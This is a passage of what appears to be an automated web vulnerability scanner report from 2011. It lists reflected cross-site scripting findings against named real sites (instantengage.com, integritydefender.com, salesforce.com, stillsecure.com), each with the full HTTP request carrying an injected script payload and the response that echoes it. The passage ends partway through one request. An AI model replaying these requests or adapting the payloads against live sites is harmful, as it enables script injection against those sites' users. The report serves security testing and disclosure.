Confidence:	Certain
Host:	http://www.instantengage.com
Path:	/open_chat.php

Issue detail

The value of the Page_ID request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload e1979%3balert(1)//9927f453968 was submitted in the Page_ID parameter. This input was echoed as e1979;alert(1)//9927f453968 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /open_chat.php?Account_ID=1756&Page_ID=2293e1979%3balert(1)//9927f453968&Email_To=alan%40integritydefender.com&Email_Subject=Enquires%20for%20Integrity%20Defenders HTTP/1.1
Host: www.instantengage.com
Proxy-Connection: keep-alive
Referer: http://www.integritydefender.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:47:11 GMT
Server: Apache/2.0.50 (Fedora)
X-Powered-By: PHP/4.3.8
P3P: CP="OTI DSP COR PSAa OUR IND COM NAV STA"
Content-Length: 5283
Connection: close
Content-Type: text/html; charset=UTF-8

<html>

<head>

<script language="javascript">
<!--
//InstantEngage Script Template//

//Page Variables - System Generated
var gURL_Server = "www.instantengage.com";
var gSSL_Port = 443;
var gAccount_ID = 1756;var gPage_ID = 2293e1979;alert(1)//9927f453968;var open_chat_direct = true; // TODO: Get VisitorID and browserID etc as per normal query to server, but only once. Then redirect to PreChatURL.
var gStatus = 1; // 1 - Browsing

function onVisitor
...[SNIP]...

6.55. http://www.integritydefender.com/buyerDetails.php [amount parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.integritydefender.com
Path:	/buyerDetails.php

Issue detail

The value of the amount request parameter is copied into the HTML document as plain text between tags. The payload c8b31<script>alert(1)</script>c0fd9e6cce9 was submitted in the amount parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /buyerDetails.php HTTP/1.1
Host: www.integritydefender.com
Proxy-Connection: keep-alive
Referer: http://www.integritydefender.com/personal.php
Cache-Control: max-age=0
Origin: http://www.integritydefender.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=da4c413fd2f41e463cb4aac35dcd5799
Content-Length: 62

amount=489c8b31<script>alert(1)</script>c0fd9e6cce9&item_name=Basic+Personal+Services&page=details&Buy=

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:46:54 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.16
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 14324

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<strong class="blacktitle">Basic Personal Services - $489c8b31<script>alert(1)</script>c0fd9e6cce9</strong>
...[SNIP]...

6.56. http://www.integritydefender.com/buyerDetails.php [amount parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.integritydefender.com
Path:	/buyerDetails.php

Issue detail

The value of the amount request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b24dc"><script>alert(1)</script>214a3ebceb3 was submitted in the amount parameter. This input was echoed as b24dc\"><script>alert(1)</script>214a3ebceb3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /buyerDetails.php HTTP/1.1
Host: www.integritydefender.com
Proxy-Connection: keep-alive
Referer: http://www.integritydefender.com/personal.php
Cache-Control: max-age=0
Origin: http://www.integritydefender.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=da4c413fd2f41e463cb4aac35dcd5799
Content-Length: 62

amount=489b24dc"><script>alert(1)</script>214a3ebceb3&item_name=Basic+Personal+Services&page=details&Buy=

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:46:53 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.16
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 14330

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<input type="hidden" name="amount" value="489b24dc\"><script>alert(1)</script>214a3ebceb3" />
...[SNIP]...

6.57. http://www.integritydefender.com/buyerDetails.php [buyerId parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.integritydefender.com
Path:	/buyerDetails.php

Issue detail

The value of the buyerId request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9b2c5"><script>alert(1)</script>9ee0e6f089d was submitted in the buyerId parameter. This input was echoed as 9b2c5\"><script>alert(1)</script>9ee0e6f089d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /buyerDetails.php?buyerId=689b2c5"><script>alert(1)</script>9ee0e6f089d HTTP/1.1
Host: www.integritydefender.com
Proxy-Connection: keep-alive
Referer: http://www.integritydefender.com/buyerDetails.php
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=da4c413fd2f41e463cb4aac35dcd5799

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:47:18 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.16
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 13356

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<input type="hidden" name="item_number" value="689b2c5\"><script>alert(1)</script>9ee0e6f089d" />
...[SNIP]...

6.58. http://www.integritydefender.com/buyerDetails.php [item_name parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.integritydefender.com
Path:	/buyerDetails.php

Issue detail

The value of the item_name request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52a0a"><script>alert(1)</script>b4d4d2ceecc was submitted in the item_name parameter. This input was echoed as 52a0a\"><script>alert(1)</script>b4d4d2ceecc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /buyerDetails.php HTTP/1.1
Host: www.integritydefender.com
Proxy-Connection: keep-alive
Referer: http://www.integritydefender.com/personal.php
Cache-Control: max-age=0
Origin: http://www.integritydefender.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=da4c413fd2f41e463cb4aac35dcd5799
Content-Length: 62

amount=489&item_name=Basic+Personal+Services52a0a"><script>alert(1)</script>b4d4d2ceecc&page=details&Buy=

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:47:03 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.16
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 14330

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<input type="hidden" name="service" value="Basic Personal Services52a0a\"><script>alert(1)</script>b4d4d2ceecc" />
...[SNIP]...

6.59. http://www.integritydefender.com/buyerDetails.php [item_name parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.integritydefender.com
Path:	/buyerDetails.php

Issue detail

The value of the item_name request parameter is copied into the HTML document as plain text between tags. The payload 7345d<script>alert(1)</script>9840b0cfec2 was submitted in the item_name parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /buyerDetails.php HTTP/1.1
Host: www.integritydefender.com
Proxy-Connection: keep-alive
Referer: http://www.integritydefender.com/personal.php
Cache-Control: max-age=0
Origin: http://www.integritydefender.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=da4c413fd2f41e463cb4aac35dcd5799
Content-Length: 62

amount=489&item_name=Basic+Personal+Services7345d<script>alert(1)</script>9840b0cfec2&page=details&Buy=

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:47:03 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.16
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 14324

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<strong class="blacktitle">Basic Personal Services7345d<script>alert(1)</script>9840b0cfec2 - $489</strong>
...[SNIP]...

6.60. https://www.salesforce.com/servlet/servlet.WebToLead [retURL parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.salesforce.com
Path:	/servlet/servlet.WebToLead

Issue detail

The value of the retURL request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d900d'%3balert(1)//e2f17b11fa9629dc1 was submitted in the retURL parameter. This input was echoed as d900d';alert(1)//e2f17b11fa9629dc1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /servlet/servlet.WebToLead?encoding=UTF-8&oid=00DC0000000Piy3&retURL=http%3A%2F%2Fwww.reputationchanger.com%2Fscheduled.htmld900d'%3balert(1)//e2f17b11fa9629dc1&lead_source=Website&first_name=2&last_name=2&email=2&phone=2333333333&description=2&imageField.x=75&imageField.y=45 HTTP/1.1
Host: www.salesforce.com
Connection: keep-alive
Referer: http://www.reputationchanger.com/
Cache-Control: max-age=0
Origin: http://www.reputationchanger.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mbox=check#true#1303485951|session#1303485890745-255084#1303487751|PC#1303485890745-255084.17#1304695494; webact=%7B%22l_vdays%22%3A-1%2C%22l_visit%22%3A0%2C%22session%22%3A1303485889743%2C%22l_search%22%3A%22%22%2C%22l_dtype%22%3A%22%22%2C%22l_page%22%3A%22SFDC%3Aus%3Aplatform%22%2C%22counter%22%3A0%2C%22pv%22%3A1%2C%22f_visit%22%3A1303485889743%2C%22version%22%3A%22w170.1%22%2C%22rescoped%22%3Atrue%2C%22db%22%3A%7B%22name%22%3A%22media%20visions%22%2C%22size%22%3A%22vsb%22%2C%22ind%22%3A%22software%20%26%20technology%3Ahigh%20tech%22%7D%2C%22bar-expanded%22%3Atrue%7D; s_pers=%20v44%3DExternal%2520Websites%7C3233921094723%3B%20v30%3DExternal%2520Websites%257Cburp%7C3233921094725%3B; s_vi=[CS]v1|26D8CEE5051D3246-60000107A001D614[CE]

Response

HTTP/1.1 200 OK
Server: SFDC
Is-Processed: true
Content-Type: text/html
Date: Mon, 25 Apr 2011 16:06:42 GMT
Content-Length: 546

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<meta HTTP-EQUIV="PRAGMA" CONTENT="NO-CACHE">
<meta http-equiv="Refresh" content="0; URL=http://www.reputationchanger.com/s
...[SNIP]...
<script>
if (window.location.replace){
window.location.replace('http://www.reputationchanger.com/scheduled.htmld900d';alert(1)//e2f17b11fa9629dc1');
} else {;
window.location.href ='http://www.reputationchanger.com/scheduled.htmld900d';alert(1)//e2f17b11fa9629dc1';
}
</script>
...[SNIP]...

6.61. https://www.salesforce.com/servlet/servlet.WebToLead [retURL parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.salesforce.com
Path:	/servlet/servlet.WebToLead

Issue detail

The value of the retURL request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0cf9"style%3d"x%3aexpression(alert(1))"99e3e02af5fd8a262 was submitted in the retURL parameter. This input was echoed as f0cf9"style="x:expression(alert(1))"99e3e02af5fd8a262 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /servlet/servlet.WebToLead?encoding=UTF-8&oid=00DC0000000Piy3&retURL=http%3A%2F%2Fwww.reputationchanger.com%2Fscheduled.htmlf0cf9"style%3d"x%3aexpression(alert(1))"99e3e02af5fd8a262&lead_source=Website&first_name=2&last_name=2&email=2&phone=2333333333&description=2&imageField.x=75&imageField.y=45 HTTP/1.1
Host: www.salesforce.com
Connection: keep-alive
Referer: http://www.reputationchanger.com/
Cache-Control: max-age=0
Origin: http://www.reputationchanger.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mbox=check#true#1303485951|session#1303485890745-255084#1303487751|PC#1303485890745-255084.17#1304695494; webact=%7B%22l_vdays%22%3A-1%2C%22l_visit%22%3A0%2C%22session%22%3A1303485889743%2C%22l_search%22%3A%22%22%2C%22l_dtype%22%3A%22%22%2C%22l_page%22%3A%22SFDC%3Aus%3Aplatform%22%2C%22counter%22%3A0%2C%22pv%22%3A1%2C%22f_visit%22%3A1303485889743%2C%22version%22%3A%22w170.1%22%2C%22rescoped%22%3Atrue%2C%22db%22%3A%7B%22name%22%3A%22media%20visions%22%2C%22size%22%3A%22vsb%22%2C%22ind%22%3A%22software%20%26%20technology%3Ahigh%20tech%22%7D%2C%22bar-expanded%22%3Atrue%7D; s_pers=%20v44%3DExternal%2520Websites%7C3233921094723%3B%20v30%3DExternal%2520Websites%257Cburp%7C3233921094725%3B; s_vi=[CS]v1|26D8CEE5051D3246-60000107A001D614[CE]

Response

HTTP/1.1 200 OK
Server: SFDC
Is-Processed: true
Content-Type: text/html
Date: Mon, 25 Apr 2011 16:06:42 GMT
Content-Length: 603

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<meta HTTP-EQUIV="PRAGMA" CONTENT="NO-CACHE">
<meta http-equiv="Refresh" content="0; URL=http://www.reputationchanger.com/scheduled.htmlf0cf9"style="x:expression(alert(1))"99e3e02af5fd8a262">
...[SNIP]...

6.62. http://www.stillsecure.com/m/ [comments parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.stillsecure.com
Path:	/m/

Issue detail

The value of the comments request parameter is copied into the HTML document as plain text between tags. The payload b9f53<script>alert(1)</script>165bb6e429d was submitted in the comments parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /m/?c=contact-us HTTP/1.1
Host: www.stillsecure.com
Proxy-Connection: keep-alive
Referer: http://www.stillsecure.com/m/?c=contact-us
Cache-Control: max-age=0
Origin: http://www.stillsecure.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=80d1802a2bda40500b441aefe0709f80; __utmz=183052004.1303732858.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183052004.352557952.1303732858.1303732858.1303732858.1; __utmc=183052004; __utmb=183052004.9.10.1303732858
Content-Length: 168

firstName=&lastName=&company=&email=&phone=&stateProvince=Not+Applicable&comments=b9f53<script>alert(1)</script>165bb6e429d&contact=1&refUrl=&rfId=&leadSource=Contact+Form&campaignName=Contact+Us&submit=Submit

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 11:58:59 GMT
Server: Apache/2.2.4 (Unix) mod_ssl/2.2.4 OpenSSL/0.9.7h-fips PHP/5.2.1
X-Powered-By: PHP/5.2.1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 17182

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title></title>
<style type="text/css" media="sc
...[SNIP]...
<textarea name="comments">b9f53<script>alert(1)</script>165bb6e429d</textarea>
...[SNIP]...

6.63. http://www.stillsecure.com/m/ [company parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.stillsecure.com
Path:	/m/

Issue detail

The value of the company request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2efe4"><script>alert(1)</script>2a9cfb0f5d8 was submitted in the company parameter. This input was echoed as 2efe4\"><script>alert(1)</script>2a9cfb0f5d8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /m/?c=contact-us HTTP/1.1
Host: www.stillsecure.com
Proxy-Connection: keep-alive
Referer: http://www.stillsecure.com/m/?c=contact-us
Cache-Control: max-age=0
Origin: http://www.stillsecure.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=80d1802a2bda40500b441aefe0709f80; __utmz=183052004.1303732858.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183052004.352557952.1303732858.1303732858.1303732858.1; __utmc=183052004; __utmb=183052004.9.10.1303732858
Content-Length: 168

firstName=&lastName=&company=2efe4"><script>alert(1)</script>2a9cfb0f5d8&email=&phone=&stateProvince=Not+Applicable&comments=&contact=1&refUrl=&rfId=&leadSource=Contact+Form&campaignName=Contact+Us&submit=Submit

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 11:58:45 GMT
Server: Apache/2.2.4 (Unix) mod_ssl/2.2.4 OpenSSL/0.9.7h-fips PHP/5.2.1
X-Powered-By: PHP/5.2.1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 17185

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title></title>
<style type="text/css" media="sc
...[SNIP]...
<input name="company" type="text" value="2efe4\"><script>alert(1)</script>2a9cfb0f5d8">
...[SNIP]...

6.64. http://www.stillsecure.com/m/ [email parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.stillsecure.com
Path:	/m/

Issue detail

The value of the email request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1f5b7"><script>alert(1)</script>eaa16a5bb36 was submitted in the email parameter. This input was echoed as 1f5b7\"><script>alert(1)</script>eaa16a5bb36 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /m/?c=contact-us HTTP/1.1
Host: www.stillsecure.com
Proxy-Connection: keep-alive
Referer: http://www.stillsecure.com/m/?c=contact-us
Cache-Control: max-age=0
Origin: http://www.stillsecure.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=80d1802a2bda40500b441aefe0709f80; __utmz=183052004.1303732858.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183052004.352557952.1303732858.1303732858.1303732858.1; __utmc=183052004; __utmb=183052004.9.10.1303732858
Content-Length: 168

firstName=&lastName=&company=&email=1f5b7"><script>alert(1)</script>eaa16a5bb36&phone=&stateProvince=Not+Applicable&comments=&contact=1&refUrl=&rfId=&leadSource=Contact+Form&campaignName=Contact+Us&submit=Submit

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 11:58:48 GMT
Server: Apache/2.2.4 (Unix) mod_ssl/2.2.4 OpenSSL/0.9.7h-fips PHP/5.2.1
X-Powered-By: PHP/5.2.1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 17196

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title></title>
<style type="text/css" media="sc
...[SNIP]...
<input name="email" type="text" value="1f5b7\"><script>alert(1)</script>eaa16a5bb36">
...[SNIP]...

6.65. http://www.stillsecure.com/m/ [firstName parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.stillsecure.com
Path:	/m/

Issue detail

The value of the firstName request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 54249"><script>alert(1)</script>bb0ca4d9c50 was submitted in the firstName parameter. This input was echoed as 54249\"><script>alert(1)</script>bb0ca4d9c50 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /m/?c=contact-us HTTP/1.1
Host: www.stillsecure.com
Proxy-Connection: keep-alive
Referer: http://www.stillsecure.com/m/?c=contact-us
Cache-Control: max-age=0
Origin: http://www.stillsecure.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=80d1802a2bda40500b441aefe0709f80; __utmz=183052004.1303732858.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183052004.352557952.1303732858.1303732858.1303732858.1; __utmc=183052004; __utmb=183052004.9.10.1303732858
Content-Length: 168

firstName=54249"><script>alert(1)</script>bb0ca4d9c50&lastName=&company=&email=&phone=&stateProvince=Not+Applicable&comments=&contact=1&refUrl=&rfId=&leadSource=Contact+Form&campaignName=Contact+Us&submit=Submit

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 11:58:38 GMT
Server: Apache/2.2.4 (Unix) mod_ssl/2.2.4 OpenSSL/0.9.7h-fips PHP/5.2.1
X-Powered-By: PHP/5.2.1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 17190

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title></title>
<style type="text/css" media="sc
...[SNIP]...
<input name="firstName" type="text" value="54249\"><script>alert(1)</script>bb0ca4d9c50">
...[SNIP]...

6.66. http://www.stillsecure.com/m/ [lastName parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.stillsecure.com
Path:	/m/

Issue detail

The value of the lastName request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb23d"><script>alert(1)</script>9630ad29cfd was submitted in the lastName parameter. This input was echoed as eb23d\"><script>alert(1)</script>9630ad29cfd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /m/?c=contact-us HTTP/1.1
Host: www.stillsecure.com
Proxy-Connection: keep-alive
Referer: http://www.stillsecure.com/m/?c=contact-us
Cache-Control: max-age=0
Origin: http://www.stillsecure.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
